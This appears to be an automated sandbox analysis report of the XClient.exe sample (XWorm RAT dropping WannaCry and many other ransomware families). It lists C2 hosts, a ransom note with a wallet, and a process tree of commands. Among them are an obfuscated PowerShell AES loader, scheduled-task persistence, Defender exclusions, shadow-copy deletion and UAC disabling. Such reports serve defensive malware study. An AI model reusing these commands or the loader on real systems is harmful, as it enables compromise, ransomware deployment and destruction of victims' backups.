Resubmissions

04-08-2024 11:35

240804-nqcl8sycrd 10

Analysis

  • max time kernel
    640s
  • max time network
    650s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-08-2024 11:35

Errors

Reason
Machine shutdown

General

  • Target

    XClient.exe

  • Size

    61KB

  • MD5

    d32248d4b7834bbe4310a9bac11968ee

  • SHA1

    b4d455bcb0c49520cfaae79321ebd2e50bd60ec6

  • SHA256

    13e0f289871d5fdb46d212725c9b13d3ab9c5012480c7cf4dd3a6708f0c3c908

  • SHA512

    70d15f6c89705484523a68267fe9765a15c437f4384ddbfa922b8a52f82e94cb53673c415f68bb42df76d3326b95dbfa4b407a1913bb9cec536ebbb6863c5f50

  • SSDEEP

    1536:zhlXi9DkMS27xQz1AOmfkbWzOhcRsUXjIOJHujn:zLy6MDu1xmkbWaalcOJH0

Malware Config

Extracted

Family

xworm

C2

tree-cleaning.gl.at.ply.gg:33027

hard-tyler.gl.at.ply.gg:27490

Attributes
  • install_file

    USB.exe

Extracted

Path

C:\Users\Admin\AppData\Roaming\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

  • Detect Xworm Payload 3 IoCs
  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • ASPack v2.12-2.42 5 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Interacts with shadow copies 3 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 9 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 62 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3556
    • C:\Program Files\VideoLAN\VLC\vlc.exe
      "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\riwebt.mp4"
      2⤵
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:4820
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lkqazl.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\lkqazl.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\lkqazl.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4416
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_792_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_792.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4056
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_792.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4560
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_792.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2120
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_792.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_792.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2620
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3808
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1680
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3716
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2284
              • C:\Users\Admin\AppData\Local\Temp\wtfujm.exe
                "C:\Users\Admin\AppData\Local\Temp\wtfujm.exe"
                7⤵
                • Executes dropped EXE
                PID:4544
                • C:\Users\Admin\AppData\Roaming\Avoid.exe
                  "C:\Users\Admin\AppData\Roaming\Avoid.exe"
                  8⤵
                    PID:2932
                  • C:\Users\Admin\AppData\Roaming\ChilledWindows.exe
                    "C:\Users\Admin\AppData\Roaming\ChilledWindows.exe"
                    8⤵
                      PID:860
                    • C:\Users\Admin\AppData\Roaming\CookieClickerHack.exe
                      "C:\Users\Admin\AppData\Roaming\CookieClickerHack.exe"
                      8⤵
                        PID:2872
                      • C:\Users\Admin\AppData\Roaming\CrazyNCS.exe
                        "C:\Users\Admin\AppData\Roaming\CrazyNCS.exe"
                        8⤵
                          PID:3244
                        • C:\Users\Admin\AppData\Roaming\Curfun.exe
                          "C:\Users\Admin\AppData\Roaming\Curfun.exe"
                          8⤵
                            PID:924
                          • C:\Users\Admin\AppData\Roaming\DesktopBoom.exe
                            "C:\Users\Admin\AppData\Roaming\DesktopBoom.exe"
                            8⤵
                              PID:2396
                            • C:\Users\Admin\AppData\Roaming\Flasher.exe
                              "C:\Users\Admin\AppData\Roaming\Flasher.exe"
                              8⤵
                                PID:2792
                              • C:\Users\Admin\AppData\Roaming\Hydra.exe
                                "C:\Users\Admin\AppData\Roaming\Hydra.exe"
                                8⤵
                                  PID:2300
                                • C:\Users\Admin\AppData\Roaming\Launcher.exe
                                  "C:\Users\Admin\AppData\Roaming\Launcher.exe"
                                  8⤵
                                    PID:4632
                                  • C:\Users\Admin\AppData\Roaming\Melting.exe
                                    "C:\Users\Admin\AppData\Roaming\Melting.exe"
                                    8⤵
                                      PID:4436
                                    • C:\Users\Admin\AppData\Roaming\Popup.exe
                                      "C:\Users\Admin\AppData\Roaming\Popup.exe"
                                      8⤵
                                        PID:1064
                                      • C:\Users\Admin\AppData\Roaming\rickroll.exe
                                        "C:\Users\Admin\AppData\Roaming\rickroll.exe"
                                        8⤵
                                          PID:4376
                                        • C:\Users\Admin\AppData\Roaming\ScreenScrew.exe
                                          "C:\Users\Admin\AppData\Roaming\ScreenScrew.exe"
                                          8⤵
                                            PID:4656
                                          • C:\Users\Admin\AppData\Roaming\Time.exe
                                            "C:\Users\Admin\AppData\Roaming\Time.exe"
                                            8⤵
                                              PID:3832
                                            • C:\Users\Admin\AppData\Roaming\Trololo.exe
                                              "C:\Users\Admin\AppData\Roaming\Trololo.exe"
                                              8⤵
                                                PID:4584
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  taskkill.exe /f /im explorer.exe
                                                  9⤵
                                                  • Kills process with taskkill
                                                  PID:1596
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  taskkill.exe /f /im taskmgr.exe
                                                  9⤵
                                                  • Kills process with taskkill
                                                  PID:4472
                                              • C:\Users\Admin\AppData\Roaming\Vista.exe
                                                "C:\Users\Admin\AppData\Roaming\Vista.exe"
                                                8⤵
                                                  PID:3656
                                                • C:\Users\Admin\AppData\Roaming\Windows-KB2670838.msu.exe
                                                  "C:\Users\Admin\AppData\Roaming\Windows-KB2670838.msu.exe"
                                                  8⤵
                                                    PID:2508
                                                  • C:\Users\Admin\AppData\Roaming\WindowsUpdate.exe
                                                    "C:\Users\Admin\AppData\Roaming\WindowsUpdate.exe"
                                                    8⤵
                                                      PID:2440
                                                    • C:\Users\Admin\AppData\Roaming\YouAreAnIdiot.exe
                                                      "C:\Users\Admin\AppData\Roaming\YouAreAnIdiot.exe"
                                                      8⤵
                                                        PID:4404
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 1204
                                                          9⤵
                                                          • Program crash
                                                          PID:1580
                                                      • C:\Users\Admin\AppData\Roaming\Monoxidex86.harmless.exe
                                                        "C:\Users\Admin\AppData\Roaming\Monoxidex86.harmless.exe"
                                                        8⤵
                                                          PID:2216
                                                        • C:\Users\Admin\AppData\Roaming\RedBoot.exe
                                                          "C:\Users\Admin\AppData\Roaming\RedBoot.exe"
                                                          8⤵
                                                            PID:432
                                                            • C:\Users\Admin\14823379\protect.exe
                                                              "C:\Users\Admin\14823379\protect.exe"
                                                              9⤵
                                                                PID:5060
                                                              • C:\Users\Admin\14823379\assembler.exe
                                                                "C:\Users\Admin\14823379\assembler.exe" -f bin "C:\Users\Admin\14823379\boot.asm" -o "C:\Users\Admin\14823379\boot.bin"
                                                                9⤵
                                                                  PID:3004
                                                                • C:\Users\Admin\14823379\overwrite.exe
                                                                  "C:\Users\Admin\14823379\overwrite.exe" "C:\Users\Admin\14823379\boot.bin"
                                                                  9⤵
                                                                    PID:5700
                                                                • C:\Users\Admin\AppData\Roaming\RedEye.exe
                                                                  "C:\Users\Admin\AppData\Roaming\RedEye.exe"
                                                                  8⤵
                                                                    PID:2840
                                                                  • C:\Users\Admin\AppData\Roaming\Rensenware.exe
                                                                    "C:\Users\Admin\AppData\Roaming\Rensenware.exe"
                                                                    8⤵
                                                                      PID:2100
                                                                      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                        dw20.exe -x -s 836
                                                                        9⤵
                                                                          PID:2544
                                                                      • C:\Users\Admin\AppData\Roaming\Rokku.exe
                                                                        "C:\Users\Admin\AppData\Roaming\Rokku.exe"
                                                                        8⤵
                                                                          PID:1036
                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                            "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                                                            9⤵
                                                                              PID:6100
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\services\VSS" /v Start /t REG_DWORD /d 4 /f
                                                                              9⤵
                                                                                PID:2040
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                                                                                9⤵
                                                                                  PID:6920
                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                  "C:\Windows\System32\net.exe" stop vss
                                                                                  9⤵
                                                                                    PID:23688
                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                      C:\Windows\system32\net1 stop vss
                                                                                      10⤵
                                                                                        PID:27944
                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                      "C:\Windows\System32\net.exe" stop swprv
                                                                                      9⤵
                                                                                        PID:12416
                                                                                    • C:\Users\Admin\AppData\Roaming\satan.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\satan.exe"
                                                                                      8⤵
                                                                                        PID:2340
                                                                                        • C:\Users\Admin\AppData\Roaming\satan.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\satan.exe"
                                                                                          9⤵
                                                                                            PID:1860
                                                                                            • C:\Users\Admin\AppData\Roaming\Upwoeb\buufu.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Upwoeb\buufu.exe"
                                                                                              10⤵
                                                                                                PID:4484
                                                                                                • C:\Users\Admin\AppData\Roaming\Upwoeb\buufu.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Upwoeb\buufu.exe"
                                                                                                  11⤵
                                                                                                    PID:4552
                                                                                                    • C:\Windows\System32\vssadmin.exe
                                                                                                      "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                      12⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:12976
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_5a217c4e.bat"
                                                                                                  10⤵
                                                                                                    PID:556
                                                                                              • C:\Users\Admin\AppData\Roaming\Satana.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Satana.exe"
                                                                                                8⤵
                                                                                                  PID:3568
                                                                                                • C:\Users\Admin\AppData\Roaming\Seftad.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Seftad.exe"
                                                                                                  8⤵
                                                                                                    PID:428
                                                                                                  • C:\Users\Admin\AppData\Roaming\SporaRansomware.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\SporaRansomware.exe"
                                                                                                    8⤵
                                                                                                      PID:4352
                                                                                                    • C:\Users\Admin\AppData\Roaming\ViraLock.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\ViraLock.exe"
                                                                                                      8⤵
                                                                                                        PID:5088
                                                                                                        • C:\Users\Admin\wwkQUMco\YyQIkQII.exe
                                                                                                          "C:\Users\Admin\wwkQUMco\YyQIkQII.exe"
                                                                                                          9⤵
                                                                                                            PID:1620
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /FI "USERNAME eq Admin" /F /IM IUMUEEQY.exe
                                                                                                              10⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:9468
                                                                                                            • C:\ProgramData\gMMUYIgw\IUMUEEQY.exe
                                                                                                              "C:\ProgramData\gMMUYIgw\IUMUEEQY.exe"
                                                                                                              10⤵
                                                                                                                PID:21936
                                                                                                            • C:\ProgramData\gMMUYIgw\IUMUEEQY.exe
                                                                                                              "C:\ProgramData\gMMUYIgw\IUMUEEQY.exe"
                                                                                                              9⤵
                                                                                                                PID:3956
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /FI "USERNAME eq Admin" /F /IM YyQIkQII.exe
                                                                                                                  10⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:7128
                                                                                                                • C:\Users\Admin\wwkQUMco\YyQIkQII.exe
                                                                                                                  "C:\Users\Admin\wwkQUMco\YyQIkQII.exe"
                                                                                                                  10⤵
                                                                                                                    PID:5628
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ViraLock"
                                                                                                                  9⤵
                                                                                                                    PID:4968
                                                                                                                    • C:\Users\Admin\AppData\Roaming\ViraLock.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\ViraLock
                                                                                                                      10⤵
                                                                                                                        PID:2108
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ViraLock"
                                                                                                                          11⤵
                                                                                                                            PID:5156
                                                                                                                            • C:\Users\Admin\AppData\Roaming\ViraLock.exe
                                                                                                                              C:\Users\Admin\AppData\Roaming\ViraLock
                                                                                                                              12⤵
                                                                                                                                PID:20736
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                                                                  13⤵
                                                                                                                                  • Modifies registry key
                                                                                                                                  PID:15156
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                                                              11⤵
                                                                                                                              • Modifies registry key
                                                                                                                              PID:6020
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                                                              11⤵
                                                                                                                              • Modifies registry key
                                                                                                                              PID:1008
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                                                              11⤵
                                                                                                                              • Modifies registry key
                                                                                                                              PID:4756
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RyAwEAsM.bat" "C:\Users\Admin\AppData\Roaming\ViraLock.exe""
                                                                                                                              11⤵
                                                                                                                                PID:6108
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                                                            9⤵
                                                                                                                            • Modifies registry key
                                                                                                                            PID:1972
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                                                            9⤵
                                                                                                                            • Modifies registry key
                                                                                                                            PID:3880
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                                                            9⤵
                                                                                                                            • Modifies registry key
                                                                                                                            PID:4620
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NaUoMkks.bat" "C:\Users\Admin\AppData\Roaming\ViraLock.exe""
                                                                                                                            9⤵
                                                                                                                              PID:3544
                                                                                                                              • C:\Windows\SysWOW64\cscript.exe
                                                                                                                                cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                                                                10⤵
                                                                                                                                  PID:10360
                                                                                                                            • C:\Users\Admin\AppData\Roaming\WannaCry.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\WannaCry.exe"
                                                                                                                              8⤵
                                                                                                                                PID:4780
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c 327301722752079.bat
                                                                                                                                  9⤵
                                                                                                                                    PID:2404
                                                                                                                                • C:\Users\Admin\AppData\Roaming\WannaCrypt0r.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WannaCrypt0r.exe"
                                                                                                                                  8⤵
                                                                                                                                    PID:624
                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                      attrib +h .
                                                                                                                                      9⤵
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:5196
                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                      icacls . /grant Everyone:F /T /C /Q
                                                                                                                                      9⤵
                                                                                                                                      • Modifies file permissions
                                                                                                                                      PID:5204
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\taskdl.exe
                                                                                                                                      taskdl.exe
                                                                                                                                      9⤵
                                                                                                                                        PID:5504
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c 231771722752086.bat
                                                                                                                                        9⤵
                                                                                                                                          PID:5744
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          attrib +h +s F:\$RECYCLE
                                                                                                                                          9⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:1084
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\taskdl.exe
                                                                                                                                          taskdl.exe
                                                                                                                                          9⤵
                                                                                                                                            PID:11400
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinlockerVB6Blacksod.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinlockerVB6Blacksod.exe"
                                                                                                                                          8⤵
                                                                                                                                            PID:5112
                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Roaming\WinlockerVB6Blacksod.exe SETUPEXEDIR=C:\Users\Admin\AppData\Roaming\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "
                                                                                                                                              9⤵
                                                                                                                                                PID:1364
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Xyeta.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Xyeta.exe"
                                                                                                                                              8⤵
                                                                                                                                                PID:1856
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 448
                                                                                                                                                  9⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:5776
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\$uckyLocker.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\$uckyLocker.exe"
                                                                                                                                                8⤵
                                                                                                                                                  PID:2144
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\7ev3n.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\7ev3n.exe"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:3740
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Annabelle.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Annabelle.exe"
                                                                                                                                                    8⤵
                                                                                                                                                      PID:5916
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\BadRabbit.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\BadRabbit.exe"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:3472
                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
